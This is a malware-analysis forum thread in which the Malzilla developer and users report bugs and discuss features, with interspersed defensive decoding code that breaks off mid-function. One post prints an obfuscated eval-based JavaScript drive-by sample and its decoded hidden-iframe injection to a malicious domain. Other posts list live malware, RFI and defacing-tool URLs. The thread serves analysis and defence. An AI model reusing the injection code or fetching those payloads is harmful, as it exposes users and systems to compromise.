Why not just use the SpiderMonkey API and a wrapper script to automate this for your standard JavaScript obfuscation? Before I started using Malzilla (which I love now) for most of my analysis I would use Perl wrapper scripts and the SpiderMonkey engine, pipe this output into a database which would then allow me to perform relational comparisons.... Not the end all be all solution, but done fairly easily. Then for any obfuscated scripts you can't parse with your current script libraries use Malzilla, translating your findings into your automated scripts for future occurrences. I say again, I love using Malzilla and Bobby has done an outstanding job, but an automated solution would be optimal.... On the other hand maybe an open API would boost support and use of Bobby's creation, maybe???
-
@TJS
If SpiderMonkey itself is vulnerable, then the Malzilla would also be vulnerable.
There is no additional risk added by this hack.
All that this hack is doing is to log what the eval() function got as arguments.
Each call will produce a file in eval_temp folder.
After script completes, Malzilla will eliminate duplicates in eval_temp, and show you the rest.
About automation, I did think about it (using PScript from Malzilla), but it is not so easy.
Malzilla is a multi-threaded application, and a lot of events are based on callback functions.
Using them in an environment that is not object-oriented is a real pain.
Example: when you run a script in decoder, Malzilla's main thread (the user interface) is not waiting for the decoding thread to finish (that would freeze the interface). When the thread finishes, it calls a callback function in Malzilla, letting it know that the results are waiting to be displayed.
That just reminded me that there is a bug in Malzilla :)
If you run a script which takes some time to finish, and create a new Decoder tab before the results are there, the results will be displayed on new tab, not on the tab from where you've sent them.
@cjeremy
Can you make a short tutorial on how you are running Malzilla under Wine on Linux? Please.
-
@MysteryFCM
There is no offense meant by putting your script there under such title. It is just so that you found an extraordinary example.
Breaking the unicode sequences in such a way as in your script - I hadn't seen anything like that before, and I'm really happy that you found it.
It was a reason to add concatenating function to Malzilla and a good lesson (for me) that one must not forget to take a look at some simple things, not always searching for clues in some complicated functions.
I tried to blog about some interesting "species", but Blogspot is a real PITA when it comes to text formatting:
http://malzilla.blogspot.com/
I gave up on that blog.
No offense taken :)
-
@bobby
Not much of a tutorial, I am afraid. It is very simple if you can get the prerequisite wine installed and running. There are a million tutorials for installing wine, and specific instructions can depend upon which distro you're using. For Ubuntu/Kubuntu Gutsy (7.10) it is fairly simple, just:
1. sudo wget http://wine.budgetdedicated.com/apt/sources.list.d/gutsy.list -O /etc/apt/sources.list.d/winehq.list
2. sudo apt-get update
3. sudo apt-get install wine
Once wine is installed, it is as simple as follows:
1. wget http://superb-west.dl.sourceforge.net/sourceforge/malzilla/malzilla_0.9.3pre4.zip (from your favorite sourceforge mirror)
2. mv malzilla_0.9.3pre4.zip ~/.wine/drive_c/Program\ Files/
3. cd ~/.wine/drive_c/Program\ Files/
4. unzip malzilla_0.9.3pre4.zip
5. cd malzilla_0.9.3pre4/
6. wine malzilla.exe & ( execute it with wine )
This works for me, but as anything in the world of software your mileage may vary!
--jeremy
-
Guys, I apologize, but something is wrong with the previous upload.
When creating the ZIP to upload, my file manager didn't add the folders, just the files.
This is very important, as some functions do not work without all the temp folders.
I've fixed this in the manner that Malzilla is now creating all the missing folders if these are not already there.
Some other interface bugs are fixed too.
Please download the new ZIP (0.9.2.5) from SourceForge.
-
Is it possible to have the space between "Send script to decoder" and "Find objects" made smaller. Also the space below "Find objects", so that the main download part can be a tiny bit bigger. The bits I am talking about have black lines by them in the picture below.
(http://img247.imageshack.us/img247/1706/17827789pf5.png)
Also could the space between "URL", "User Agent", "Referrer" and "Cookies" be made a little smaller so that the main download part can be a little bigger.
-
@JohnC
Done.
I also did that you can collapse/expand that panel.
@cjeremy
May I get your permission to post your tutorial on Malzilla's web site?
-
@bobby
No worries, go for it! Not much of tutorial though ;)
-
...he-he,I really like the way that Malzilla has pretty much evolved in being THE standard,
when it comes to analyzing infected/obfuscated webpages... :)
http://www.securityfocus.com/blogs/716
-
Nice catch sowhat-x... I am really proud that I'm involved with this project in some way.
Keep up the great work, bobby. :)
TJS
-
Thanks guys :)
I'll try to get another upload this weekend. Nothing special changed. There is one more redirection method detected in HTTP headers (thanks JohnC), and little GUI redesign to get more space for page source on Download tab.
I also started some other additions (take a look at right-click menu), but it is still not complete (just internal scripts are working for now).
One more thing is missing in case/log mode, and I'll try to fix it tomorrow.
Next Friday I'm going on vacation for 3 weeks, and I won't have an internet connection (nor a PC at all :) )
-
Another feature request:
How about associating hxxp with malzilla so that we can embed hxxp links in webpages and have them automatically load up with malzilla? That'll save us from having to do lots of copy/pasting from MDL (and other sites) into Malzilla :P
Just another random idea for after your vacations :)
TJS
-
:-[ I only found out about Malzilla yesterday, it's certainly more efficient than Lynx, and I love the decoding functions, sure beats doing it the hard way.
An idea: we're seeing more and more FTP RFIs than just a few months ago, any possibility of porting Malzilla for FTP grabs?
-
@tjs
Doesn't the Clipboard monitor do the job similar to what you request?
@Orac
I'll do something about FTP grabs, but I can do it when I come back from vacation.
-
I've had a few bad experiences with the clipboard monitor so I haven't experimented with it too much. I'll check it out.
-
Clipboard monitor can be annoying sometimes.
It monitors clipboard for links (keywords can be defined on Settings tab).
In the beginning, it was a problem that it grabbed all the links twice (double entries in the list).
I've solved that by clearing the clipboard after getting the links.
Solution for Malzilla, but it was a problem for other apps running.
Now, it does not clear the clipboard (other apps should not experience problems while Malzilla is running), but it tries to detect double entries and delete them from the list.
The current problem now is that Clipboard Monitor does also detect internal copy/paste of links inside Malzilla (I do not find this useful) as Malzilla is using the Windows' clipboard.
-
Sorry guys, I didn't succeed in preparing the new release before I go on vacation (tomorrow morning).
It is full of half-baked functions, and I would not like to upload it in such a state.
See you in 3 weeks (3 weeks without a PC :) ).
-
Have fun dude :)
-
Have a nice time away :)
-
Thanks guys.
The following is not official release (but you can get it if you want to try it):
http://rapidshare.com/files/108547702/malzilla.exe.html
You will need the dll files from the latest official version of Malzilla:
http://sourceforge.net/project/showfiles.php?group_id=203466&package_id=242804&release_id=587544
What is half-baked:
- you will see "Run script" in right-click menu (works on selected text, or on whole text if no selection is made). Internal scripts are working, external are not implemented at all
- the state of "Use referrer" on Download page is not saved in INI file for the next session
- Download panel - button panels can be hidden (click anywhere between the buttons) to extend the space for downloaded source and HTTP headers. There are problems with some combinations of resizing the form and hide/unhide the panels - buttons are not always restored to the right position
- some JavaScripts can break Malzilla if "Debug" is used. It does not break if "Run script" is used. It manifests in cleaning all the settings, URL history etc. This bug affects all the previous versions of Malzilla. I can't do a lot here, except of preventing Malzilla to overwrite the settings files with empty ones. This is not an exploit for Malzilla. It is just that Debugger does not finish working (gets stuck), and you need to kill Malzilla. Malzilla will receive the termination signal, and it will do the closing operations (saving settings) which are empty because the thread containing the settings (GUI) is not responding. All the settings files will be overwritten with empty files.
There may be something else that I can't recall at the moment.
Cheers,
bobby
-
Hope you have a great vacation Bobby
I've had another idea for Malzilla: within the HTTP header section, adding the resolved DNS and connection information would be very helpful, especially when faced with redirects. Example:
Resolving ess.trix.net... 200.201.192.41, 200.201.192.31
Connecting to ess.trix.net[200.201.192.41]:80... failed: No route to host.
Connecting to ess.trix.net[200.201.192.31]:80... connected.
-
Looks like SANS is now using Malzilla as part of their training
http://www.sans.org/training/description.php?mid=54
TJS
-
hi bobby:
<script>
ADDE21259CAE84 = "parseIn";
ADDE21259CAE84 += "t";
A3CB8FA3E0 = "String.fr";
A3CB8FA3E0 += "omC";
A3CB8FA3E0 += "h";
A3CB8FA3E0 += "a";
A3CB8FA3E0 += "rCode";
function DAC027B90(EAA256797A)
{
var D8BE9398766CD = 676;
D8BE9398766CD = D8BE9398766CD - 660;
D59FA5 = eval(ADDE21259CAE84 + "(EAA256797A,D8BE9398766CD)");
return (D59FA5);
}
function B06AA5(B08FD4DEDD6A39)
{
var E24A10 = 122;
E24A10 = E24A10 - 120;
var D7502F1FF7C = "";
for (FECA5EB378C6D0E = 0; FECA5EB378C6D0E < B08FD4DEDD6A39.length; FECA5EB378C6D0E += E24A10)
{
D7502F1FF7C += ( eval(A3CB8FA3E0 + "(DAC027B90(B08FD4DEDD6A39.substr(FECA5EB378C6D0E,E24A10)))"));
}
eval(D7502F1FF7C);
}
B06AA5("76796E3D646F63756D656E742E676574456C656D656E744279496428276B696727293B69662876796E3D3D6E756C6C297B646F63756D656E742E777269746528273C696672616D652069643D6B6967207372633D687474703A2F2F7665726F7373612E696E666F207374796C653D646973706C61793A6E6F6E653E3C2F696672616D653E27293B7D");
</script>
This script may leave Malzilla's decoder in the "Working..." state. I chose replace eval() with method and filled in document.write, as you know.
But it stays in this state...
So I decoded it manually:
vyn=document.getElementById('kig');
if(vyn==null)
{
document.write('<iframe id=kig src=http://verossa.info style=display:none></iframe>');
}
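Added example, not part of the post above and not Malzilla's code: the hex-pair layer in the posted script can be peeled as plain data, without calling eval(), and the same loop applies the stop conditions suggested earlier in the thread (a stop string is found, or n layers have been decoded). The function names, the stop pattern and the layer limit are assumptions; the returned layers can be written to disk by the caller.

```javascript
// Added example (not Malzilla code): peel hex-pair layers without eval().

// Constructed sample: only the final call of the script posted above, with
// the payload copied from that post. Nothing in it is executed here.
const SAMPLE = 'B06AA5("' +
  '76796E3D646F63756D656E742E676574456C656D656E744279496428276B696727293B' +
  '69662876796E3D3D6E756C6C297B646F63756D656E742E777269746528273C69667261' +
  '6D652069643D6B6967207372633D687474703A2F2F7665726F7373612E696E666F2073' +
  '74796C653D646973706C61793A6E6F6E653E3C2F696672616D653E27293B7D' +
  '");';

// Strings that end the peeling once they show up in a decoded layer.
const DEFAULT_STOP = /\.exe|<iframe|https?:\/\//i;

// The transform the posted script performs with substr(i, 2),
// parseInt(chunk, 16) and String.fromCharCode, done as plain data handling.
function hexToText(hex) {
  let out = '';
  for (let i = 0; i < hex.length; i += 2) {
    out += String.fromCharCode(parseInt(hex.slice(i, i + 2), 16));
  }
  return out;
}

// Quoted literals made only of hex pairs (at least 8 bytes) are candidates.
function findHexLiterals(src) {
  const re = /(["'])((?:[0-9A-Fa-f]{2}){8,})\1/g;
  const found = [];
  let m;
  while ((m = re.exec(src)) !== null) found.push(m[2]);
  return found;
}

// Reject decodes that are mostly non-printable (a hash, not a script).
function looksLikeText(s) {
  let printable = 0;
  for (const ch of s) {
    const c = ch.charCodeAt(0);
    if (c === 9 || c === 10 || c === 13 || (c >= 32 && c <= 126)) printable++;
  }
  return s.length > 0 && printable / s.length >= 0.9;
}

// hxxp-style defanging, as used for links elsewhere in this thread.
function defang(url) {
  return url.replace(/^http/i, 'hxxp');
}

// Returns every layer (index 0 is the input), why peeling stopped, and the
// defanged URLs found in the last layer.
function peelLayers(src, stopPattern = DEFAULT_STOP, maxLayers = 5) {
  const layers = [src];
  let reason = 'max-layers';
  for (let n = 0; n < maxLayers; n++) {
    const current = layers[layers.length - 1];
    const decoded = findHexLiterals(current).map(hexToText).filter(looksLikeText);
    if (decoded.length === 0) { reason = 'no-more-layers'; break; }
    layers.push(decoded.join('\n'));
    if (stopPattern.test(layers[layers.length - 1])) { reason = 'stop-string'; break; }
  }
  const last = layers[layers.length - 1];
  const urls = (last.match(/https?:\/\/[^\s"'<>]+/gi) || []).map(defang);
  return { layers, reason, urls };
}
```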
-
Hi jimmyleo,
Use last build and chose "Leave as is" option. You will get the same result like the one you got manually.
-
yeap, got it ;D
and another bug? maybe
link following:
hxxp://xindizhi88.com/ai/Yes.htm
JSEncode, at first glance, and MZ only decodes part of it; the rest is messy characters.
jimi :)
-
Thanks for reporting this bug.
It has something to do with conversion between ASCII and Unicode.
The script decodes OK until first non-English character appears, and it goes into a mess after that.
Please use this online JScript.encode decoder until I get this bug fixed:
http://www.greymagic.com/security/tools/decoder/decoder.asp
-
A little preview of what I'm working on:
http://rapidshare.com/files/122620084/malzilla_preview.zip.html
News:
- handling HTTPS by using OpenSSL (saw a malware last week, which was hosted on a HTTPS)
- minor GUI changes
- internal minimalistic HTML render (still does not handle all HTML tags)
- better Format Code (at least I think it is better). Major difference is that FC will not touch anything inside quotation marks. FOR loops handling is also done better.
- Link Parser - it does Line select now, a click on a line will select the whole line
- Tools - some improvements and new edit functions
- Download tab - please test new option in tab's right-click menu: New tab (next step). Current URL will be a referrer on new tab, and cookies are set. Note that cookies set by scripts in HTML code are not handled, just cookies from HTTP headers are processed by Malzilla
Bugs:
- JSEncode decoder goes messy with Unicode chars in code (JSEncode does not work with Unicode, one need to translate the code page, and even worse - one need to know which code page was in use)
- probably more bugs
- probably even more bugs
ToDo:
- implement more DOM objects (href, location etc.)
- stop working on Malzilla if Symantec and SANS guys keep cropping the screenshots so that the title "Malzilla by bobby" gets cut off from the pictures they post in the blogs. More than that, make a JScript that Symantec and SANS guys can't decode with current Malzilla, and tell them you won't improve Malzilla until they post the whole screenshots
- or implement nag screens which will affect just the Symantec guys (and others who feel embarrassed if they mention that they are using Malzilla) :)
Regressions:
- some JS functions not working anymore (alert, dialogs)
To explain the regression with some JS functions - as of moving the complete interaction with SpiderMonkey into a separate thread, and as a thread isn't a part of GUI (GUI is part of main thread), SpiderMonkey can't access any GUI-related things anymore. This is the next thing I'll work on.
-
Can you upload it here please? (I've tried numerous times but I'll be damned if I can get the RS captcha correct ??? )
-
http://malzilla.sf.net/malzilla_preview.zip
Too big to be attached to a post here. I've uploaded to Malzilla site.
Please report bugs, both in GUI and in handling JavaScripts.
If anyone want to send me a script which can't be handled, please save it from Malzilla as a project file (Settings > Download > Add project info to saved files) or please provide the complete URL, referrer, User Agent and cookies.
A lot of scripts are depending on these parameters, and can't be deobfuscated if these are not known.
-
Nice one, cheers :)
-
In a real hurry at the moment,can't really reply properly... :-\
Too big to be attached to a post here.
For future reference:
since people have complained more than a few times about it,he-he... :D
i've increased attachments' file size up to 2mb...
- handling HTTPS by using OpenSSL
Won't say more - that's really damned good news 8)
Just something that quickly came to mind,
not a suggestion,just trying to give out ideas...
maybe you'd also like to have a look at MatrixSSL:
http://www.matrixssl.org/
It's 'supposedly' more lightweight/easy to use than OpenSSL...
- probably more bugs
- probably even more bugs
Lmao! ;D
We all put 100% trust on you -> but I guess you already knew that... ;)
So,I translate this to:
- probably more of excellent hard work from bobby
-
Ive had a quick play with the preview, really like the "New tab (next step)" and can see that coming in useful.
Ive had problems with HTTPS a few times in recent months, this addition will be a major help.
Also like the mini HTML view that should prove to have its uses.
Will comment further when ive used it for a few days.
Many thanks for all the hard work you do for us all :)
-
I got a new bug to report today...
Found a drive-by that pads script with nulls... Malzilla really didn't like this, and neither did textpad's search/replace function.
Here is the original malicious page:
hxxp://ch.moneybee.net/blog/kehker/hker.htm
Let me know if it goes down and you need a copy attached.
Ex:
3C00000000000068000000007400000000006D00006C00003E0000000000000D0A0000000000002000000000000000200000000000003C7300000063000000000000007200000000000000690000007000000000000000007400000000000000
TJS
-
@tjs
Attached to this post is an updated EXE with additional function to remove nulls.
Right click on text box containing NULLs (Decoder, Download, any other text box) > Run Script (internal) > Remove NULLs
-
Forgot to say - Concatenate function is updated too.
Now it can handle even something like the following:
"T" + 'e' & "s" + 't'
-
You rock!
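Added example, not part of the posts above and not Malzilla's code: one way a NUL-removal pass and a literal-concatenation pass like the "Remove NULLs" and "Concatenate" functions described above can be chained before a script is read. The function names and the sample input are assumptions; the sample is constructed.

```javascript
// Added example (not Malzilla's code): two clean-up passes for decoder input.

// Constructed sample: a statement padded with NUL characters, with a string
// split across mixed quotes and both + and & as concatenation operators.
const PADDED_SAMPLE = `x\u0000 = "do\u0000cu" + 'me\u0000\u0000nt' & ".wr" + 'ite';`;

// One quoted literal, double or single, with backslash escapes honoured.
const LIT = /"(?:[^"\\]|\\.)*"|'(?:[^'\\]|\\.)*'/.source;

// Either a run of literals joined by + or &, or a lone literal. Matching the
// lone literal as well keeps the scan from starting inside a quoted string.
const RUN_OR_LIT = new RegExp(
  `((?:${LIT})(?:\\s*[+&]\\s*(?:${LIT}))+)|(?:${LIT})`, 'g');

// Drop NUL characters; they carry no meaning in script text but break
// searching and tokenising.
function removeNulls(text) {
  return text.replace(/\0/g, '');
}

// Join the bodies of one run into a single double-quoted literal.
function foldRun(run) {
  const body = run.match(new RegExp(LIT, 'g')).map((lit) => {
    const inner = lit.slice(1, -1);
    if (lit[0] === '"') return inner;
    // A bare " inside a single-quoted piece must be escaped in the result;
    // existing escape pairs are passed through untouched.
    return inner.replace(/\\.|"/g, (m) => (m === '"' ? '\\"' : m));
  }).join('');
  return '"' + body + '"';
}

// Fold adjacent literals; operators inside quotes and operands that are not
// literals (variables, calls) are left alone.
function foldConcatenation(src) {
  return src.replace(RUN_OR_LIT, (match, run) => (run ? foldRun(run) : match));
}

// NULs first: they can sit inside literals and between tokens, where they
// would otherwise stop two literals from being recognised as adjacent.
function normalize(text) {
  return foldConcatenation(removeNulls(text));
}
```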
-
One small point.
With Malzilla 0.9.3pre5 we have a box that can be check marked for "Auto-redirect" under Settings/Download
This box is missing from the new version, and instead we get a pop up asking if we want to follow the redirect.
Personally I am finding this pop up to be a bit of a pain, would it be possible to have the Auto-redirect check box back as per 0.9.3pre5?
-
:-[ Ooopppppppps forget my post above, just found it on the download page :-[
/me books an appointment with the optician's
-
Hi Orac,
It is my fault I didn't mention it.
I found it more useful to be on the first page.
I'm not known as someone who is taking notes of what is done/changed/etc. You can see that from the changelogs :)
Next few days I'll do a review of the code. I need to take a look if everything is logged in log/case mode.
After that I'll push another official download on Malzilla's website.
Any suggestions that can be implemented with less work/modifications?
After this version, I'll really go for implementing more DOM objects.
The easiest way is to have them as templates that implements new DOM objects in realtime.
This way anyone can make his own templates which would implement the missing DOM objects.
Guess some of you have no clue what I'm talking about, but it will be much easier when I show that with examples.
-
Any suggestions that can be implemented with less work/modifications?
I have no idea how much work or modifications would be involved with either of these, but do have two "wish list" items
1. Porting Malzilla for FTP.
2. In the HTTP header section adding resolved DNS and IP connection(s).
-
Hi Orac,
What would you exactly want about FTP?
Just a possibility to download a file from FTP, or a full-featured FTP client (two panels - local and remote folder etc.)
Just getting a file from FTP isn't so hard to do. For Filezilla-alike client I would need a lot of time.
About resolving DNS and such - I have no clue how to do that. I know almost nothing about the theory of resolving DNS servers, lookups and such.
-
Maybe Synapse is of interest...
it provides support for both ftp/dns,works under both win32/*nix...
Heh,just noticed it also has some kind of support for OpenSSL also:
http://www.ararat.cz/synapse/doku.php/features
One older nice piece of code that I keep around for reference,
usable under both win32/*nix...in C though:
http://benoit.papillault.free.fr/c/socket/dns.c
-
Bobby,
For resolving you can use the Windows API :)
gethostbyname
gethostbyaddr
Both a part of the wsock32 DLL
I wrote an AX to do it for my server if you'd like a copy?
-
...gethostbyname/gethostbyaddr functions are actually..."Berkeley sockets" API,lol... ;)
http://en.wikipedia.org/wiki/Berkeley_sockets
-
hehe
-
Winsock 2 functions for Delphi...Jedi provides that,
but my guess is that this info is not really something new/helpful to bobby... :-\
http://jedi-apilib.sourceforge.net/
Here's also an alternative Winsock2 delphi unit implementation,
coded from Aphex,lol...semi-'hackish' source :)
-
Thanks Bobby
All I want to be able to do is get a file from FTP port 21 using Malzilla, more RFIs are now using FTP:// in place of HTTP://
For example here's an active one from last week's logs, ftp://193.253.223.43/tmp/trem/oldbisok
A fully featured FTP isn't required, neither is the ability to sign in to the FTP port, I just want to grab the file and run. I am currently using Lynx to do this, if that fails I've had success using a plain vanilla copy of Firefox. I've never tried with IE, grabbing live malware with IE doesn't appeal lol
-
This is a lot of posts to answer :)
@Orac
I'll try to make a simple FTP handling this weekend.
@sowhat-x
Malzilla uses Synapse for HTTP, and I'll use it for FTP too.
There is a TraceRoute example in Synapse package, but it does not work always. It works well on trying traceroute to Yahoo, but never works for Google.
Here is the main problem - I think I have a solution to get the IP of a website, but I want to do it in one single step with the HTTP "GET" (opening a website).
If anyone can recall, Malzilla got the most attention exactly because it accessed MPack sites in one single step. If you use a downloader that does "HEAD" before "GET", it gets banned from MPack (and other *pack sites).
Now, I'm not sure if asking a DNS server for the IP in one step, and doing it again in HTTP "GET" would produce some false results. I guess it can do if the DNS server is malicious, or resolves to other IP every time you ask for a website.
See, I must find a way to do it in one single step, either by hacking Synapse to get the results right from HTTP "GET" command, or asking on Synapse mailing list if this is already implemented (I couldn't find it last night in the API), or as a last solution - rewrite Malzilla (not to use Synapse anymore, but to do low-level Winsocks calls).
I would not like to go away from Synapse. It would be a loooooooot of work to do.
So, thank you all on searching for a solution, but I need to get a solution for doing this by using Synapse, and to do it in one single DNS server access, which means I need to read the resolved IP address from Synapse at the step where Synapse is doing resolving the host in order to do HTTP GET.
-
...seems that we got distracted with ideas related either to the 'easiness' of daily use,
and/or the implementations of socket-related functions,thereby...
we completely ignored the actual malware-related implications that are involved... :(
=================
P.S:...not relevant with Malzilla itself...since the dns resolving thing got raised earlier,
I got interested today in searching around cross-platform sources for doing this...
Stumbled upon this one as well...if it's of interest to anyone:
http://aluigi.altervista.org/mytoolz/hostsdns.zip
-
@Orac
Basic FTP is implemented.
I need to fix some minor glitches before I upload a new build.
-
Many thanks Bobby :)
-
Orac, can you test this version (attached)?
If you have a file to download from FTP, use GET button (just like for HTTP).
If you want to see a content of a folder on FTP, use CTRL + GET button (URL must be a folder).
If you need to login to the server, use the standard URL scheme:
ftp://user:password@server.com(:port)/folder/file.txt
If the user and pass are not supplied, the following will be used (you must provide login data even for Anonymous access):
user: Anonymous
pass: aa@aa.aa
In the future I'll make this to be set up by the user (settings for anonymous user name and pass). As for now it is hardcoded.
Clipboard Monitor still does not have FTP protocol implemented.
-
Bobby, I've downloaded (twice) but it won't open, all I am getting is
malzilla.exe is not a valid Win32 application
-
Works fine here when I download it from my previous post.
Would you like that I upload it somewhere else for you?
Maybe you have connection problems at downloading from MDL.
-
I tried a cold reboot of the whole system, downloaded it again but it wouldn't open for the same reason :(
Then tried a few other tricks, such as running it in Windows 95 compatibility mode, no change.
Checked the downloaded file, it's 0 bytes !!
I've not had a problem downloading from MDL before but it may be worth trying another location. Like MysteryFCM I've had problems in the past using RS and I know others in the UK that have too, I think it's something with our ISPs. But never had this kind of problem either here or from any of the other forums we all know and use.
If no one else reports the same problem, then it has to be my end.
-
On a more positive note, just had the chance to use HTTPS for the first time, It worked great :)
-
Try to grab the files from here:
http://malzilla.sourceforge.net/builds/
Grab just the Malzilla.exe if you already have the DLL files from your previous downloads.
-
On a more positive note, just had the chance to use HTTPS for the first time, It worked great :)
Here is how and where I test Malzilla:
Test of GZiped transfer - http://carsten.codimi.de/gzip.yaws/
Test of sent HTTP headers - http://c2.com/cgi/test/
Test of HTTPS - www.gmail.com - follow the first redirection
I still need to find where I can test FTP functionality. As for now, I'm doing it by testing the communication with FTP server of MyCity forum. I would like to find some test server, like the C2 test for HTTP headers.
-
That download worked.
Just tested it on some live ftp malware links, and it works perfectly :)
Thanks Bobby, that's a great job you've done, next time you're in the UK I owe you a few beers. Afraid I can't help with suitable test sites, the only links I've got are either live malware, or they have been cleaned up.
-
I just downloaded the build from http://malzilla.sourceforge.net/builds/ and found several bugs:
* when using a link with hxxp, the tab name is named hxxp: instead of domain name
example:
hxxp://test.com (tab title: hxxp:)
http://test.com (tab title: test.com)
* check for new updates says that a new update is available
* names in 'about' all have a space before them
Thanks,
TJS
-
Thanks for adding the little box to choose how much to increase/decrease on Misc Decoders tab, works great :)
-
I just downloaded the build from http://malzilla.sourceforge.net/builds/ and found several bugs:
* when using a link with hxxp, the tab name is named hxxp: instead of domain name
example:
hxxp://test.com (tab title: hxxp:)
http://test.com (tab title: test.com)
* check for new updates says that a new update is available
* names in 'about' all have a space before them
Thanks,
TJS
Hi TJS,
- hxxp thing - fixed (fxp is translated to ftp too). I fixed this once, but it seems that it is gone after I reverted some changes (anyone recall my trying to make a splash screen?)
- spaces in about box fixed
- these are just test builds, neither the update info on the server or the version info in the Malzilla are set up. These are just test builds for us here. I'll set the right values for the formal release on SourceForge
Thanks for testing and reporting :)
Thanks for adding the little box to choose how much to increase/decrease on Misc Decoders tab, works great :)
Hi JohnC,
I have set a limit for that box (-255, 255), is that OK?
I'm not sure if it will work with Unicode in the way it works with ANSI/ASCII.
-
Please download fixed build from http://malzilla.sourceforge.net/builds/
I have fixed the bugs reported by TJS.
-
Thanks for adding the little box to choose how much to increase/decrease on Misc Decoders tab, works great :)
Hi JohnC,
I have set a limit for that box (-255, 255), is that OK?
I'm not sure if it will work with Unicode in the way it works with ANSI/ASCII.
That should be fine, thank you.
-
If I try to retrieve this directory with Malzilla using CTRL + GET
ftp://193.253.223.43/tmp/trem/
I see
06-19-08 10:50PM 681 1
06-19-08 10:50PM 20673 2
06-19-08 10:50PM 1244 old
06-19-08 10:50PM 1929 oldbisok
But if I try and get the file oldbisok, with just GET, I get the response:
"550 /tmp/trem/oldbisok: Le fichier spécifié est introuvable. "
But the file is definitely there and available for download because I grabbed it with an FTP client to make sure.
-
If I try to retrieve this directory with Malzilla using CTRL + GET
ftp://193.253.223.43/tmp/trem/
I see
06-19-08 10:50PM 681 1
06-19-08 10:50PM 20673 2
06-19-08 10:50PM 1244 old
06-19-08 10:50PM 1929 oldbisok
But if I try and get the file oldbisok, with just GET, I get the response:
"550 /tmp/trem/oldbisok: Le fichier spécifié est introuvable. "
But the file is definitely there and available for download because I grabbed it with an FTP client to make sure.
I know that one, I tried it at testing Malzilla's FTP capabilities. I got the same results.
After that I wanted to be sure, and tried it from Firefox, and I got exactly the same error like in Malzilla.
Which FTP client did you use when you succeeded in downloading the file?
-
FlashFXP. It sends RETR oldbisok
-
Hmmm... I just got the file by using Total Commander's integrated FTP client.
So, there is something with settings, as Malzilla and Firefox do not get it, but normal FTP clients do.
There is one basic difference between a ordinary FTP client and Malzilla.
FTP client logs in on the servers, and does not log out until you say so.
Malzilla logs in and out for every click on GET button.
I'll take a look now at connection parameters, to see if it has something to do with PASSIVE settings.
Some servers needs that mode for transferring binary files.
-
Sometimes a server will need PASV mode enabled/disabled to do stuff, in this case I just checked and it works either way. After logging in It also sends "TYPE I", if that helps you.
-
I saw where is the trick ;D
The file on the server has a malformed name - it contains space at the end.
Malzilla trims the spaces at the beginning and end of the URL by default. This way I prevent mistakes done by bad copy/paste of links from text files or websites.
It seems that FireFox does it too.
What to do now?
To trim spaces or not to trim?
-
OK, get the new EXE from http://malzilla.sourceforge.net/builds/
Hold SHIFT while clicking on the GET button, and the whitespaces will not be trimmed out.
To summarize the functions of GET button:
HTTP URLs:
- SHIFT = no trim
FTP URLs:
- SHIFT = no trim
- CTRL = LIST (works only if URL points to a folder)
- SHIFT + CTRL = no trim + LIST
btw. if you get LIST results and try to select (with cursor) behind the oldbisok file, you will see that you have just one whitespace behind the filename.
FTP unit in Malzilla is now changed a lot (PASV + TYPE I + different parsing of filename and path from URL). Please report if something got broken that downloaded successfully with previous build (worked before changes, now does not work).
-
Downloaded the update yesterday, all seems to be working as intended.
Just used the FTP (on the three RFI links i posted earlier today) and it works perfectly.
Havnt got any new HTTPS links to test (yet), will report back on this aspect when i get one ;)
-
Possible bug
This link http://baptiste-bugnon.ch/help/ix.dat is a copy of Defacing Tool, the link to "//The Rules" wasn't passed to the Links parser, neither was the link "<!-- saved from url=" at the top of the script.
-
No, it is not a bug, it is a feature :)
Malzilla does just what every webspider does - follow the HREF links.
It does not search for every link in the file. Links from textual part of file, links from comments and the links from scripts are not on the list in Link Parser.
I will now explain why is this done this way.
I DO have code that will catch every single URL, even from binary files, but this is far from perfect for HTML files.
Namely, most of the links in HTML files are relative paths (eg. "/images/image.gif")
Those would be missed by my other code that I have.
The current code in Malzilla searches for every HREF and checks whether it is a relative or absolute path. If it is relative, it searches for the Base tag (not necessarily present in every HTML document). If Base is found, then the absolute paths are calculated relative to this basis. If the Base tag is not present, the current URL (from the URL box on the Download tab) is taken as the basis for calculating. See the Link Parser tab, "URI base" field. If it says "URI base (detected)", it means that the HTML contains a Base tag. If it says "URI base (not detected)", it means that the URL from Download tab > URL box is used for calculation.
As an example, save any HTML page that does not contain Base tag in HTML header, and where some relative URLs are existing in the document.
Now open a new Download tab and load this document. Take a look at LinkParser - you will not have complete URLs anymore because Malzilla does not know the basis URL.
A solution is to save pages as 'Malzilla projects' (see Settings tab). This way extra info is added to every saved HTML page (does not destroy the page as the info is added in the form of comments). At loading such HTML in Malzilla next time, Malzilla will know the base URL, UserAgent and referrer used.
Now, I can add extra list in LinkParser that will contain all the links detected by a regular expression. That will catch every ABSOLUTE URL (relative URLs can't be found with such function), no matter if the URL is in comment or anywhere else in the document.
More info on Base tag:
http://www.w3schools.com/TAGS/tag_base.asp
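Added example, not part of the post above and not Malzilla's code: a small parser that follows the behaviour described there (HREF links resolved against the Base tag or the page URL, links in comments and scripts not followed) and, beside it, the regular-expression pass that only finds absolute URLs. The function names and the sample page are assumptions; the sample is constructed.

```javascript
// Added example (not Malzilla's code): HREF link parsing with <base> handling.

// Constructed sample page: relative and absolute HREFs, a <base> tag, and
// URLs that appear only in a comment and inside a script.
const SAMPLE_HTML = [
  '<!-- saved from url=(0022)http://example.org/old -->',
  '<html><head><base href="http://cdn.example.net/site/"></head><body>',
  '<a href="/images/image.gif">image</a>',
  "<a href='page2.html'>next</a>",
  '<a href=http://example.com/abs>absolute</a>',
  '<script>// The Rules: http://example.org/rules.txt',
  '</script></body></html>',
].join('\n');

// Read one attribute value (double-quoted, single-quoted or bare) from a tag.
function attr(tag, name) {
  const re = new RegExp(
    '\\s' + name + '\\s*=\\s*(?:"([^"]*)"|\'([^\']*)\'|([^\\s>]+))', 'i');
  const m = re.exec(tag);
  return m ? (m[1] ?? m[2] ?? m[3]) : null;
}

// pageUrl is the URL the page was fetched from; pass undefined for a saved
// file whose origin is unknown.
function parseLinks(html, pageUrl) {
  // Comments and script bodies are dropped first, so only HREFs in the
  // markup itself end up in the followed-links list.
  const visible = html
    .replace(/<!--[\s\S]*?-->/g, '')
    .replace(/<script\b[\s\S]*?<\/script\s*>/gi, '');

  // Base for relative paths: the <base> tag if present, else the page URL.
  let base = pageUrl;
  let baseDetected = false;
  const baseTag = /<base\b[^>]*>/i.exec(visible);
  const baseHref = baseTag ? attr(baseTag[0], 'href') : null;
  if (baseHref) {
    try {
      base = new URL(baseHref.trim(), pageUrl).href;
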